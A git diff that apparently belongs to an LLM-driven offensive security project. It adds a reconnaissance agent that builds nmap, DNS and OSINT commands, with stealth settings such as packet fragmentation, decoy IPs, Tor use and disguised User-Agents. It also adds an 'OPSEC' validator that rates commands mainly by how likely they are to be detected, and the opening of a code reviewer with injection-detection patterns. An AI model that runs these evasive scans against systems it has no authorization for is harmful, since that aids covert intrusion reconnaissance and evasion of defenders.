'medium': { + 'timing': 'T3', + 'port_limit': 1000, + 'techniques': ['syn_scan', 'service_detection'], + 'delay_between_scans': 1 + }, + 'high': { + 'timing': 'T2', + 'port_limit': 100, + 'techniques': ['syn_scan'], + 'delay_between_scans': 5 + }, + 'maximum': { + 'timing': 'T1', + 'port_limit': 22, # Common ports only + 'techniques': ['passive_only'], + 'delay_between_scans': 30 + } + } + + def analyze_target(self, target_info: ReconTarget) -> ReconResult: + """ + Analyze target and generate reconnaissance strategy. + + HUMAN_APPROVAL_REQUIRED: Review target analysis before proceeding + """ + self.logger.info(f"Analyzing target: {target_info.target}") + + # Get OPSEC profile + opsec_profile = self.opsec_profiles.get(target_info.opsec_level, self.opsec_profiles['medium']) + + # Generate reconnaissance commands + commands = { + 'nmap': self._generate_nmap_commands(target_info, opsec_profile), + 'passive_dns': self._generate_passive_dns_commands(target_info), + 'osint': self._generate_osint_commands(target_info), + 'shodan': self._generate_shodan_queries(target_info) + } + + # Generate passive techniques + passive_techniques = self._generate_passive_techniques(target_info) + + # OPSEC considerations + opsec_notes = self._generate_opsec_notes(target_info, opsec_profile) + + # Risk assessment + risk_assessment = self._assess_reconnaissance_risk(target_info, commands) + + # Next steps + next_steps = self._suggest_next_steps(target_info, commands) + + return ReconResult( + target=target_info.target, + commands=commands, + passive_techniques=passive_techniques, + opsec_notes=opsec_notes, + risk_assessment=risk_assessment, + next_steps=next_steps + ) + + def _generate_nmap_commands(self, target: ReconTarget, opsec_profile: Dict) -> List[str]: + """Generate OPSEC-aware Nmap commands.""" + commands = [] + timing = opsec_profile['timing'] + port_limit = min(opsec_profile['port_limit'], self.config['max_scan_ports']) + + if 'passive_only' in opsec_profile['techniques']: + return [] # No active scanning for maximum stealth + + # Host discovery + if target.opsec_level in ['low', 'medium']: + commands.append(f"nmap -sn {target.target}") + + # Port scanning + if 'syn_scan' in opsec_profile['techniques']: + commands.append(f"nmap -sS -{timing} --top-ports {port_limit} {target.target}") + elif 'tcp_connect' in opsec_profile['techniques']: + commands.append(f"nmap -sT -{timing} --top-ports {port_limit} {target.target}") + + # Service detection (careful with stealth) + if 'service_detection' in opsec_profile['techniques'] and target.opsec_level != 'high': + commands.append(f"nmap -sV -{timing} --version-intensity 2 {target.target}") + + # OS detection (only for low OPSEC) + if target.opsec_level == 'low': + commands.append(f"nmap -O -{timing} {target.target}") + + # Add stealth flags + for i, cmd in enumerate(commands): + if target.opsec_level in ['high', 'maximum']: + commands[i] += " -f --scan-delay 1000ms" # Fragment packets, add delay + + return commands + + def _generate_passive_dns_commands(self, target: ReconTarget) -> List[str]: + """Generate passive DNS reconnaissance commands.""" + commands = [] + + if target.target_type == 'domain': + commands.extend([ + f"dig {target.target} ANY", + f"dig {target.target} TXT", + f"dig {target.target} MX", + f"dig {target.target} NS", + f"whois {target.target}", + f"curl -s 'https://crt.sh/?q={target.target}&output=json'" + ]) + + return commands + + def _generate_osint_commands(self, target: ReconTarget) -> List[str]: + """Generate OSINT gathering commands.""" + commands = [] + + if target.target_type in ['domain', 'organization']: + commands.extend([ + f"theharvester -d {target.target} -b google,bing,linkedin", + f"amass enum -d {target.target}", + f"subfinder -d {target.target}", + f"curl -s 'https://api.github.com/search/code?q={target.target}'" + ]) + + return commands + + def _generate_shodan_queries(self, target: ReconTarget) -> List[str]: + """Generate Shodan search queries.""" + if not self.config.get('shodan_api_key'): + return ["# Shodan API key not configured"] + + queries = [] + + if target.target_type == 'ip': + queries.append(f"host:{target.target}") + elif target.target_type == 'domain': + queries.extend([ + f"hostname:{target.target}", + f"ssl:{target.target}", + f"org:\"{target.target}\"" + ]) + elif target.target_type == 'organization': + queries.append(f"org:\"{target.target}\"") + + return queries + + def _generate_passive_techniques(self, target: ReconTarget) -> List[str]: + """Generate list of passive reconnaissance techniques.""" + techniques = [ + "Certificate Transparency log analysis", + "DNS cache snooping", + "BGP route analysis", + "Social media reconnaissance", + "Job posting analysis", + "Public document metadata extraction", + "Wayback Machine analysis", + "GitHub/GitLab repository search" + ] + + if target.target_type == 'organization': + techniques.extend([ + "LinkedIn employee enumeration", + "SEC filing analysis", + "Press release analysis", + "Conference presentation search" + ]) + + return techniques + + def _generate_opsec_notes(self, target: ReconTarget, opsec_profile: Dict) -> List[str]: + """Generate OPSEC considerations and warnings.""" + notes = [] + + if target.opsec_level == 'maximum': + notes.extend([ + "MAXIMUM STEALTH: Use only passive techniques", + "Consider using Tor or VPN for all queries", + "Spread reconnaissance over multiple days", + "Use different source IPs for different queries" + ]) + elif target.opsec_level == 'high': + notes.extend([ + "HIGH STEALTH: Minimize active scanning", + "Use packet fragmentation and timing delays", + "Consider using decoy IPs", + "Monitor for defensive responses" + ]) + elif target.opsec_level == 'medium': + notes.extend([ + "MEDIUM STEALTH: Balance speed and stealth", + "Use moderate timing delays", + "Avoid aggressive service detection" + ]) + else: # low + notes.extend([ + "LOW STEALTH: Speed prioritized over stealth", + "Full port ranges and service detection enabled", + "Monitor logs for potential detection" + ]) + + # General OPSEC notes + notes.extend([ + "Log all reconnaissance activities", + "Use legitimate-looking User-Agent strings", + "Vary timing between different techniques", + "Document any anomalous responses" + ]) + + return notes + + def _assess_reconnaissance_risk(self, target: ReconTarget, commands: Dict) -> str: + """Assess the risk level of the reconnaissance plan.""" + risk_factors = [] + + # Count active scanning commands + active_commands = len(commands.get('nmap', [])) + if active_commands > 5: + risk_factors.append("High number of active scans") + + # Check OPSEC level vs techniques + if target.opsec_level == 'maximum' and active_commands > 0: + risk_factors.append("Active scanning conflicts with maximum stealth requirement") + + # Check for aggressive techniques + nmap_commands = ' '.join(commands.get('nmap', [])) + if '-A' in nmap_commands or '--script' in nmap_commands: + risk_factors.append("Aggressive scanning techniques detected") + + if not risk_factors: + return "LOW: Reconnaissance plan follows OPSEC guidelines" + elif len(risk_factors) <= 2: + return f"MEDIUM: Consider addressing: {'; '.join(risk_factors)}" + else: + return f"HIGH: Multiple risk factors identified: {'; '.join(risk_factors)}" + + def _suggest_next_steps(self, target: ReconTarget, commands: Dict) -> List[str]: + """Suggest next steps based on reconnaissance results.""" + steps = [ + "Execute passive reconnaissance first", + "Analyze results for interesting services/ports", + "Proceed with active scanning if OPSEC allows", + "Document all findings in structured format", + "Identify potential attack vectors", + "Plan next phase based on discovered services" + ] + + if target.opsec_level in ['high', 'maximum']: + steps.insert(1, "Wait 24-48 hours between reconnaissance phases") + + return steps + + def execute_reconnaissance(self, target_info: ReconTarget) -> Dict: + """ + Execute reconnaissance plan (simulation/planning mode). + + HUMAN_APPROVAL_REQUIRED: Manual execution required for actual scanning + """ + self.logger.warning("SIMULATION MODE: Actual command execution disabled for safety") + + recon_result = self.analyze_target(target_info) + + # Return structured results for logging/analysis + return { + 'target': target_info.target, + 'opsec_level': target_info.opsec_level, + 'plan': recon_result.__dict__, + 'execution_status': 'SIMULATION_ONLY', + 'timestamp': str(Path().cwd()) + } + +# Example usage and testing +if __name__ == "__main__": + # Configure logging + logging.basicConfig(level=logging.INFO) + + # Initialize agent + agent = ReconAgent() + + # Example target + target = ReconTarget( + target="example.com", + target_type="domain", + constraints={"time_limit": "2h", "stealth": True}, + opsec_level="high" + ) + + # Analyze target + result = agent.execute_reconnaissance(target) + print(json.dumps(result, indent=2)) diff --git a/src/agents/safety_agent.py b/src/agents/safety_agent.py new file mode 100644 index 0000000000000000000000000000000000000000..211981c47efefa5067310f42bea79137dd14314f --- /dev/null +++ b/src/agents/safety_agent.py @@ -0,0 +1,526 @@ +""" +SafetyAgent: OPSEC Compliance and Safety Validation Agent +Validates operations for OPSEC compliance and safety considerations. +""" + +import json +import logging +import re +from typing import Dict, List, Optional, Any, Tuple +from dataclasses import dataclass +from pathlib import Path +from enum import Enum + +class RiskLevel(Enum): + LOW = "low" + MEDIUM = "medium" + HIGH = "high" + CRITICAL = "critical" + +@dataclass +class SafetyCheck: + """Safety check result.""" + check_name: str + risk_level: RiskLevel + description: str + violations: List[str] + recommendations: List[str] + +@dataclass +class SafetyAssessment: + """Complete safety assessment result.""" + overall_risk: RiskLevel + checks: List[SafetyCheck] + approved: bool + summary: str + safe_alternatives: List[str] + +class SafetyAgent: + """Advanced safety and OPSEC compliance validation agent.""" + + def __init__(self, config_path: Optional[Path] = None): + self.logger = logging.getLogger(__name__) + self.config = self._load_config(config_path) + self.opsec_rules = self._load_opsec_rules() + self.risk_patterns = self._load_risk_patterns() + + def _load_config(self, config_path: Optional[Path]) -> Dict: + """Load safety agent configuration.""" + default_config = { + 'strict_mode': True, + 'auto_approve_low_risk': False, + 'require_human_approval': ['high', 'critical'], + 'logging_level': 'INFO', + 'detection_threshold': 0.7 + } + + if config_path and config_path.exists(): + with open(config_path, 'r') as f: + user_config = json.load(f) + default_config.update(user_config) + + return default_config + + def _load_opsec_rules(self) -> Dict: + """Load OPSEC rules and best practices.""" + return { + 'timing_rules': { + 'max_requests_per_minute': 10, + 'min_delay_between_scans': 1000, # milliseconds + 'avoid_business_hours': True, + 'spread_over_days': ['high', 'maximum'] + }, + 'stealth_rules': { + 'use_decoy_ips': ['high', 'maximum'], + 'fragment_packets': ['medium', 'high', 'maximum'], + 'randomize_source_ports': True, + 'avoid_default_timing': ['medium', 'high', 'maximum'] + }, + 'target_rules': { + 'avoid_honeypots': True, + 'check_threat_intelligence': True, + 'respect_robots_txt': True, + 'avoid_government_domains': True + }, + 'operational_rules': { + 'log_all_activities': True, + 'use_vpn_tor': ['high', 'maximum'], + 'rotate_infrastructure': ['high', 'maximum'], + 'monitor_defensive_responses': True + } + } + + def _load_risk_patterns(self) -> Dict: + """Load patterns that indicate high-risk activities.""" + return { + 'high_detection_commands': [ + r'-A\b', # Aggressive scan + r'--script.*vuln', # Vulnerability scripts + r'-sU.*-sS', # UDP + SYN scan combination + r'--top-ports\s+(\d+)', # High port count + r'-T[45]', # Aggressive timing + r'--min-rate\s+\d{3,}', # High rate scanning + r'nikto', # Web vulnerability scanner + r'sqlmap', # SQL injection tool + r'hydra', # Brute force tool + r'john', # Password cracker + r'hashcat' # Password cracker + ], + 'opsec_violations': [ + r'--reason', # Custom scan reason (logging risk) + r'-v{2,}', # High verbosity + r'--packet-trace', # Packet tracing + r'--traceroute', # Network path disclosure + r'-sn.*--traceroute', # Ping sweep with traceroute + r'--source-port\s+53', # DNS source port spoofing + r'--data-string', # Custom data (potential signature) + ], + 'infrastructure_risks': [ + r'shodan.*api', # Shodan API usage + r'censys.*search', # Censys API usage + r'virustotal', # VirusTotal queries + r'threatcrowd', # Threat intelligence queries + r'passivetotal' # PassiveTotal queries + ], + 'time_sensitive': [ + r'while.*true', # Infinite loops + r'for.*in.*range\(\s*\d{3,}', # Large iterations + r'sleep\s+[0-9]*[.][0-9]+', # Very short delays + r'--max-rate', # Rate limiting bypass + ] + } + + def validate_commands(self, commands: Dict[str, List[str]], opsec_level: str = 'medium') -> SafetyAssessment: + """ + Validate a set of commands for OPSEC compliance and safety. + + Args: + commands: Dictionary of command categories and command lists + opsec_level: Required OPSEC level ('low', 'medium', 'high', 'maximum') + + Returns: + SafetyAssessment with validation results + """ + self.logger.info(f"Validating commands for OPSEC level: {opsec_level}") + + checks = [] + + # Perform individual safety checks + checks.append(self._check_detection_risk(commands)) + checks.append(self._check_opsec_compliance(commands, opsec_level)) + checks.append(self._check_timing_compliance(commands, opsec_level)) + checks.append(self._check_infrastructure_safety(commands)) + checks.append(self._check_target_appropriateness(commands)) + + # Calculate overall risk + overall_risk = self._calculate_overall_risk(checks) + + # Determine approval status + approved = self._determine_approval(overall_risk, opsec_level) + + # Generate summary + summary = self._generate_summary(checks, overall_risk, approved) + + # Generate safe alternatives if not approved + safe_alternatives = [] + if not approved: + safe_alternatives = self._generate_safe_alternatives(commands, opsec_level) + + return SafetyAssessment( + overall_risk=overall_risk, + checks=checks, + approved=approved, + summary=summary, + safe_alternatives=safe_alternatives + ) + + def _check_detection_risk(self, commands: Dict[str, List[str]]) -> SafetyCheck: + """Check for commands with high detection risk.""" + violations = [] + recommendations = [] + + all_commands = [] + for cmd_list in commands.values(): + all_commands.extend(cmd_list) + + command_text = ' '.join(all_commands) + + for pattern in self.risk_patterns['high_detection_commands']: + matches = re.findall(pattern, command_text, re.IGNORECASE) + if matches: + violations.append(f"High-detection pattern found: {pattern}") + + # Check for aggressive scanning combinations + if '-sS' in command_text and '-sV' in command_text: + violations.append("Aggressive scanning combination: SYN scan + service detection") + + if len(violations) == 0: + risk_level = RiskLevel.LOW + description = "No high-detection risk patterns found" + elif len(violations) <= 2: + risk_level = RiskLevel.MEDIUM + description = "Some detection risk patterns identified" + recommendations.extend([ + "Consider using stealth timing (-T1 or -T2)", + "Add packet fragmentation (-f)", + "Implement delays between scans" + ]) + else: + risk_level = RiskLevel.HIGH + description = "Multiple high-detection risk patterns found" + recommendations.extend([ + "Significantly reduce scanning aggressiveness", + "Use passive techniques where possible", + "Implement substantial delays", + "Consider using decoy IPs" + ]) + + return SafetyCheck( + check_name="Detection Risk Analysis", + risk_level=risk_level, + description=description, + violations=violations, + recommendations=recommendations + ) + + def _check_opsec_compliance(self, commands: Dict[str, List[str]], opsec_level: str) -> SafetyCheck: + """Check OPSEC compliance based on required level.""" + violations = [] + recommendations = [] + + all_commands = ' '.join([' '.join(cmd_list) for cmd_list in commands.values()]) + + # Check stealth requirements + stealth_rules = self.opsec_rules['stealth_rules'] + + if opsec_level in ['medium', 'high', 'maximum'] and '-T4' in all_commands: + violations.append("Aggressive timing (-T4) conflicts with stealth requirements") + + if opsec_level in ['high', 'maximum'] and not any('-f' in cmd for cmd_list in commands.values() for cmd in cmd_list): + violations.append("Packet fragmentation (-f) recommended for high stealth") + + if opsec_level == 'maximum' and any('nmap' in cmd for cmd_list in commands.values() for cmd in cmd_list): + violations.append("Active scanning not recommended for maximum stealth") + + # Check for OPSEC violation patterns + for pattern in self.risk_patterns['opsec_violations']: + if re.search(pattern, all_commands, re.IGNORECASE): + violations.append(f"OPSEC violation pattern: {pattern}") + + # Determine risk level + if len(violations) == 0: + risk_level = RiskLevel.LOW + description = f"Commands comply with {opsec_level} OPSEC requirements" + elif len(violations) <= 2: + risk_level = RiskLevel.MEDIUM + description = f"Minor OPSEC compliance issues for {opsec_level} level" + else: + risk_level = RiskLevel.HIGH + description = f"Significant OPSEC violations for {opsec_level} level" + + # Generate recommendations based on OPSEC level + if opsec_level == 'maximum': + recommendations.extend([ + "Use only passive reconnaissance techniques", + "Employ Tor or VPN for all queries", + "Spread activities over multiple days" + ]) + elif opsec_level == 'high': + recommendations.extend([ + "Use stealth timing (-T1 or -T2)", + "Implement packet fragmentation", + "Add significant delays between operations" + ]) + + return SafetyCheck( + check_name="OPSEC Compliance", + risk_level=risk_level, + description=description, + violations=violations, + recommendations=recommendations + ) + + def _check_timing_compliance(self, commands: Dict[str, List[str]], opsec_level: str) -> SafetyCheck: + """Check timing and rate limiting compliance.""" + violations = [] + recommendations = [] + + all_commands = ' '.join([' '.join(cmd_list) for cmd_list in commands.values()]) + + # Check for timing violations + timing_rules = self.opsec_rules['timing_rules'] + + # Check for aggressive timing + aggressive_timing = re.findall(r'-T([45])', all_commands) + if aggressive_timing and opsec_level in ['medium', 'high', 'maximum']: + violations.append(f"Aggressive timing (-T{'/'.join(aggressive_timing)}) violates {opsec_level} OPSEC") + + # Check for high rate scanning + rate_matches = re.findall(r'--min-rate\s+(\d+)', all_commands) + if rate_matches: + for rate in rate_matches: + if int(rate) > 100 and opsec_level in ['high', 'maximum']: + violations.append(f"High scan rate ({rate}) not suitable for {opsec_level} OPSEC") + + # Check for insufficient delays + delay_matches = re.findall(r'--scan-delay\s+(\d+)', all_commands) + if opsec_level in ['high', 'maximum'] and not delay_matches: + violations.append("Scan delays not specified for high stealth requirement") + + risk_level = RiskLevel.LOW if len(violations) == 0 else ( + RiskLevel.MEDIUM if len(violations) <= 2 else RiskLevel.HIGH + ) + + if risk_level != RiskLevel.LOW: + recommendations.extend([ + "Implement appropriate scan timing for OPSEC level", + "Add delays between scan phases", + "Consider spreading scans over longer time periods" + ]) + + return SafetyCheck( + check_name="Timing Compliance", + risk_level=risk_level, + description=f"Timing analysis for {opsec_level} OPSEC level", + violations=violations, + recommendations=recommendations + ) + + def _check_infrastructure_safety(self, commands: Dict[str, List[str]]) -> SafetyCheck: + """Check for infrastructure and API safety.""" + violations = [] + recommendations = [] + + all_commands = ' '.join([' '.join(cmd_list) for cmd_list in commands.values()]) + + # Check for infrastructure risks + for pattern in self.risk_patterns['infrastructure_risks']: + if re.search(pattern, all_commands, re.IGNORECASE): + violations.append(f"Infrastructure risk: {pattern}") + + # Check for API key exposure + if 'api' in all_commands.lower() and 'key' in all_commands.lower(): + violations.append("Potential API key exposure in commands") + + risk_level = RiskLevel.LOW if len(violations) == 0 else RiskLevel.MEDIUM + + if violations: + recommendations.extend([ + "Secure API keys using environment variables", + "Use VPN/proxy for external API queries", + "Monitor API usage quotas" + ]) + + return SafetyCheck( + check_name="Infrastructure Safety", + risk_level=risk_level, + description="Infrastructure and API safety analysis", + violations=violations, + recommendations=recommendations + ) + + def _check_target_appropriateness(self, commands: Dict[str, List[str]]) -> SafetyCheck: + """Check target appropriateness and legal considerations.""" + violations = [] + recommendations = [] + + # Extract targets from commands + targets = self._extract_targets_from_commands(commands) + + for target in targets: + # Check for government domains + if any(gov_tld in target.lower() for gov_tld in ['.gov', '.mil', '.fed']): + violations.append(f"Government domain detected: {target}") + + # Check for known honeypot indicators + if any(honeypot in target.lower() for honeypot in ['honeypot', 'canary', 'trap']): + violations.append(f"Potential honeypot detected: {target}") + + risk_level = RiskLevel.CRITICAL if any('.gov' in v or '.mil' in v for v in violations) else ( + RiskLevel.HIGH if violations else RiskLevel.LOW + ) + + if risk_level != RiskLevel.LOW: + recommendations.extend([ + "Verify authorization for all targets", + "Review legal implications", + "Consider using test environments" + ]) + + return SafetyCheck( + check_name="Target Appropriateness", + risk_level=risk_level, + description="Target selection and legal compliance", + violations=violations, + recommendations=recommendations + ) + + def _extract_targets_from_commands(self, commands: Dict[str, List[str]]) -> List[str]: + """Extract target IPs/domains from commands.""" + targets = [] + + for cmd_list in commands.values(): + for cmd in cmd_list: + # Simple regex to find IP addresses and domains + ip_pattern = r'\b(?:\d{1,3}\.){3}\d{1,3}\b' + domain_pattern = r'\b[a-zA-Z0-9](?:[a-zA-Z0-9-]{0,61}[a-zA-Z0-9])?(?:\.[a-zA-Z0-9](?:[a-zA-Z0-9-]{0,61}[a-zA-Z0-9])?)*\b' + + targets.extend(re.findall(ip_pattern, cmd)) + targets.extend(re.findall(domain_pattern, cmd)) + + return list(set(targets)) # Remove duplicates + + def _calculate_overall_risk(self, checks: List[SafetyCheck]) -> RiskLevel: + """Calculate overall risk level from individual checks.""" + risk_scores = { + RiskLevel.LOW: 1, + RiskLevel.MEDIUM: 2, + RiskLevel.HIGH: 3, + RiskLevel.CRITICAL: 4 + } + + max_risk = max(check.risk_level for check in checks) + avg_risk = sum(risk_scores[check.risk_level] for check in checks) / len(checks) + + # If any check is critical, overall is critical + if max_risk == RiskLevel.CRITICAL: + return RiskLevel.CRITICAL + + # If average risk is high, overall is high + if avg_risk >= 3.0: + return RiskLevel.HIGH + elif avg_risk >= 2.0: + return RiskLevel.MEDIUM + else: + return RiskLevel.LOW + + def _determine_approval(self, overall_risk: RiskLevel, opsec_level: str) -> bool: + """Determine if commands are approved based on risk and configuration.""" + if overall_risk == RiskLevel.CRITICAL: + return False + + if overall_risk == RiskLevel.HIGH and self.config['strict_mode']: + return False + + if overall_risk.value in self.config['require_human_approval']: + self.logger.warning(f"HUMAN APPROVAL REQUIRED for {overall_risk.value} risk level") + return False # Requires manual approval + + if overall_risk == RiskLevel.LOW and self.config['auto_approve_low_risk']: + return True + + return overall_risk in [RiskLevel.LOW, RiskLevel.MEDIUM] + + def _generate_summary(self, checks: List[SafetyCheck], overall_risk: RiskLevel, approved: bool) -> str: + """Generate a summary of the safety assessment.""" + violation_count = sum(len(check.violations) for check in checks) + + status = "APPROVED" if approved else "REJECTED" + + summary = f"Safety Assessment: {status}\n" + summary += f"Overall Risk Level: {overall_risk.value.upper()}\n" + summary += f"Total Violations: {violation_count}\n" + + if not approved: + summary += "\nREASONS FOR REJECTION:\n" + for check in checks: + if check.violations: + summary += f"- {check.check_name}: {len(check.violations)} violations\n" + + return summary + + def _generate_safe_alternatives(self, commands: Dict[str, List[str]], opsec_level: str) -> List[str]: + """Generate safer alternative commands.""" + alternatives = [] + + # General safer alternatives + alternatives.extend([ + "Use passive reconnaissance techniques first", + "Implement longer delays between scans (--scan-delay 2000ms)", + "Use stealth timing (-T1 or -T2)", + "Add packet fragmentation (-f)", + "Reduce port scan range (--top-ports 100)", + "Use decoy IPs (-D RND:10)" + ]) + + if opsec_level in ['high', 'maximum']: + alternatives.extend([ + "Consider using only passive techniques", + "Employ Tor/VPN for all reconnaissance", + "Spread activities over multiple days", + "Use different source IPs for different phases" + ]) + + return alternatives + +# Example usage and testing +if __name__ == "__main__": + # Configure logging + logging.basicConfig(level=logging.INFO) + + # Initialize safety agent + agent = SafetyAgent() + + # Example commands to validate + test_commands = { + 'nmap': [ + 'nmap -sS -T4 --top-ports 1000 example.com', + 'nmap -A -v example.com' + ], + 'passive': [ + 'dig example.com ANY', + 'whois example.com' + ] + } + + # Validate commands + assessment = agent.validate_commands(test_commands, opsec_level='high') + + print(f"Assessment: {assessment.approved}") + print(f"Overall Risk: {assessment.overall_risk.value}") + print(f"Summary:\n{assessment.summary}") + + if assessment.safe_alternatives: + print(f"\nSafe Alternatives:") + for alt in assessment.safe_alternatives: + print(f"- {alt}") diff --git a/src/analysis/code_reviewer.py b/src/analysis/code_reviewer.py new file mode 100644 index 0000000000000000000000000000000000000000..ba8d5276d513c54d19729a86809ee1999fb6df6e --- /dev/null +++ b/src/analysis/code_reviewer.py @@ -0,0 +1,1021 @@ +""" +Code Review and Analysis Suite for Cyber-LLM +Advanced static analysis, security review, and optimization identification + +Author: Muzan Sano +""" + +import ast +import re +import os +import json +import asyncio +import logging +from pathlib import Path +from typing import Dict, List, Any, Optional, Set, Tuple +from dataclasses import dataclass, field +from datetime import datetime +import subprocess +from collections import defaultdict, Counter + +# Security analysis imports +import bandit +from bandit.core.config import BanditConfig +from bandit.core.manager import BanditManager + +# Code quality imports +try: + import pylint.lint + import flake8.api.legacy as flake8 + from mypy import api as mypy_api +except ImportError: + print("Install code quality tools: pip install pylint flake8 mypy") + +@dataclass +class CodeIssue: + """Represents a code issue found during analysis""" + file_path: str + line_number: int + severity: str # critical, high, medium, low, info + issue_type: str # security, performance, maintainability, style, bug + description: str + recommendation: str + confidence: float = 1.0 + cwe_id: Optional[str] = None # Common Weakness Enumeration ID + +@dataclass +class ReviewResults: + """Complete code review results""" + total_files_analyzed: int + total_lines_analyzed: int + issues: List[CodeIssue] = field(default_factory=list) + metrics: Dict[str, Any] = field(default_factory=dict) + security_score: float = 0.0 + maintainability_score: float = 0.0 + performance_score: float = 0.0 + overall_score: float = 0.0 + +class SecurityAnalyzer: + """Advanced security analysis for cybersecurity applications""" + + def __init__(self): + self.logger = logging.getLogger("security_analyzer") + + # Custom security patterns for cybersecurity tools + self.security_patterns = { + "hardcoded_credentials": [ + r"password\s*=\s*['\"][^'\"]{3,}['\"]", + r"api_key\s*=\s*['\"][^'\"]{10,}['\"]", + r"secret\s*=\s*['\"][^'\"]{8,}['\"]", + r"token\s*=\s*['\"][^'\"]{16,}['\"]" + ], + "command_injection": [ + r"os\.system\s*\(", + r"subprocess\.call\s*\(", + r"subprocess\.run\s*\(", + r"eval\s*\(", + r"exec\s*\(" + ], + "sql_injection": [ + r"execute\s*\(\s*['\"].*%s.*['\"]", + r"cursor\.execute\s*\(\s*[f]?['\"].*\{.*\}.*['\"]" + ], + "path_traversal": [ + r"open\s*\(\s*.*\+.*\)", + r"file\s*\(\s*.*\+.*\)", + r"\.\./" + ], + "insecure_random": [ + r"random\.random\(\)", + r"random\.choice\(", + r"random\.randint\(" + ] + } + + async def analyze_security(self, file_paths: List[str]) -> List[CodeIssue]: + """Comprehensive security analysis""" + + security_issues = [] + + for file_path in file_paths: + if not file_path.endswith('.py'): + continue + + self.logger.info(f"Security analysis: {file_path}") + + try: + # Read file content + with open(file_path, 'r', encoding='utf-8') as f: + content = f.read() + + # Pattern-based security analysis + pattern_issues = await self._analyze_security_patterns(file_path, content) + security_issues.extend(pattern_issues) + + # AST-based security analysis + ast_issues = await self._analyze_ast_security(file_path, content) + security_issues.extend(ast_issues) + + # Bandit integration for comprehensive security scanning + bandit_issues = await self._run_bandit_analysis(file_path) + security_issues.extend(bandit_issues) + + except Exception as e: + self.logger.error(f"Error analyzing {file_path}: {str(e)}") + security_issues.append(CodeIssue( + file_path=file_path, + line_number=0, + severity="medium", + issue_type="security", + description=f"Analysis error: {str(e)}", + recommendation="Manual review required" + )) + + return security_issues + + async def _analyze_security_patterns(self, file_path: str, content: str) -> List[CodeIssue]: + """Pattern-based security vulnerability detection""" + + issues = [] + lines = content.split('\n') + + for category, patterns in self.security_patterns.items(): + for pattern in patterns: + for line_num, line in enumerate(lines, 1): + if re.search(pattern, line, re.IGNORECASE): + severity, recommendation = self._get_security_severity(category, line) + + issues.append(CodeIssue( + file_path=file_path, + line_number=line_num, + severity=severity, + issue_type="security", + description=f"Potential {category.replace('_', ' ')}: {line.strip()}", + recommendation=recommendation, + confidence=0.8 + )) + + return issues + + async def _analyze_ast_security(self, file_path: str, content: str) -> List[CodeIssue]: + """AST-based security analysis for complex patterns""" + + issues = [] + + try: + tree = ast.parse(content) + + class SecurityVisitor(ast.NodeVisitor): + def __init__(self): + self.issues = [] + + def visit_Call(self, node): + # Check for dangerous function calls + if isinstance(node.func, ast.Name): + func_name = node.func.id + + if func_name in ['eval', 'exec']: + self.issues.append(CodeIssue( + file_path=file_path, + line_number=node.lineno, + severity="critical", + issue_type="security", + description=f"Dangerous function call: {func_name}", + recommendation="Avoid using eval/exec, use safer alternatives", + cwe_id="CWE-94" + )) + + elif isinstance(node.func, ast.Attribute): + if (isinstance(node.func.value, ast.Name) and + node.func.value.id == 'os' and + node.func.attr == 'system'): + + self.issues.append(CodeIssue( + file_path=file_path, + line_number=node.lineno, + severity="high", + issue_type="security", + description="Command injection risk: os.system()", + recommendation="Use subprocess with shell=False", + cwe_id="CWE-78" + )) + + self.generic_visit(node) + + def visit_Import(self, node): + for alias in node.names: + if alias.name in ['pickle', 'cPickle']: + self.issues.append(CodeIssue( + file_path=file_path, + line_number=node.lineno, + severity="medium", + issue_type="security", + description="Insecure deserialization: pickle import", + recommendation="Use json or safer serialization methods", + cwe_id="CWE-502" + )) + + self.generic_visit(node) + + visitor = SecurityVisitor() + visitor.visit(tree) + issues.extend(visitor.issues) + + except SyntaxError as e: + issues.append(CodeIssue( + file_path=file_path, + line_number=e.lineno or 0, + severity="high", + issue_type="security", + description=f"Syntax error prevents security analysis: {str(e)}", + recommendation="Fix syntax errors before security analysis" + )) + + return issues + + async def _run_bandit_analysis(self, file_path: str) -> List[CodeIssue]: + """Run Bandit security scanner""" + + issues = [] + + try: + # Configure Bandit + config = BanditConfig() + manager = BanditManager(config, 'file') + manager.discover_files([file_path]) + manager.run_tests() + + # Convert Bandit results to CodeIssue format + for result in manager.get_issue_list(): + issues.append(CodeIssue( + file_path=result.filename, + line_number=result.lineno, + severity=result.severity, + issue_type="security", + description=result.text, + recommendation=f"Bandit {result.test_id}: {result.text}", + confidence=self._convert_bandit_confidence(result.confidence), + cwe_id=getattr(result, 'cwe_id', None) + )) + + except Exception as e: + self.logger.warning(f"Bandit analysis failed for {file_path}: {str(e)}") + + return issues + + def _get_security_severity(self, category: str, line: str) -> Tuple[str, str]: + """Get severity and recommendation for security issue""" + + severity_map = { + "hardcoded_credentials": ("critical", "Use environment variables or secure vaults"), + "command_injection": ("critical", "Use parameterized commands and input validation"), + "sql_injection": ("critical", "Use parameterized queries and prepared statements"), + "path_traversal": ("high", "Validate and sanitize file paths"), + "insecure_random": ("medium", "Use cryptographically secure random functions") + } + + return severity_map.get(category, ("medium", "Review for security implications")) + + def _convert_bandit_confidence(self, confidence: str) -> float: + """Convert Bandit confidence to numeric value""" + + confidence_map = { + "HIGH": 0.9, + "MEDIUM": 0.7, + "LOW": 0.5 + } + + return confidence_map.get(confidence, 0.6) + +class PerformanceAnalyzer: + """Performance analysis and optimization identification""" + + def __init__(self): + self.logger = logging.getLogger("performance_analyzer") + + self.performance_patterns = { + "inefficient_loops": [ + r"for.*in.*range\(len\(", + r"while.*len\(" + ], + "string_concatenation": [ + r"\+\s*['\"].*['\"]", + r".*\+=.*['\"]" + ], + "global_variables": [ + r"^global\s+\w+" + ], + "nested_loops": [], # Detected via AST + "database_queries_in_loops": [], # Detected via AST + } + + async def analyze_performance(self, file_paths: List[str]) -> List[CodeIssue]: + """Comprehensive performance analysis""" + + performance_issues = [] + + for file_path in file_paths: + if not file_path.endswith('.py'): + continue + + self.logger.info(f"Performance analysis: {file_path}") + + try: + with open(file_path, 'r', encoding='utf-8') as f: + content = f.read() + + # Pattern-based analysis + pattern_issues = await self._analyze_performance_patterns(file_path, content) + performance_issues.extend(pattern_issues) + + # AST-based analysis for complex patterns + ast_issues = await self._analyze_ast_performance(file_path, content) + performance_issues.extend(ast_issues) + + except Exception as e: + self.logger.error(f"Error analyzing {file_path}: {str(e)}") + + return performance_issues + + async def _analyze_performance_patterns(self, file_path: str, content: str) -> List[CodeIssue]: + """Pattern-based performance issue detection""" + + issues = [] + lines = content.split('\n') + + for category, patterns in self.performance_patterns.items(): + if not patterns: # Skip empty pattern lists + continue + + for pattern in patterns: + for line_num, line in enumerate(lines, 1): + if re.search(pattern, line): + severity, recommendation = self._get_performance_severity(category) + + 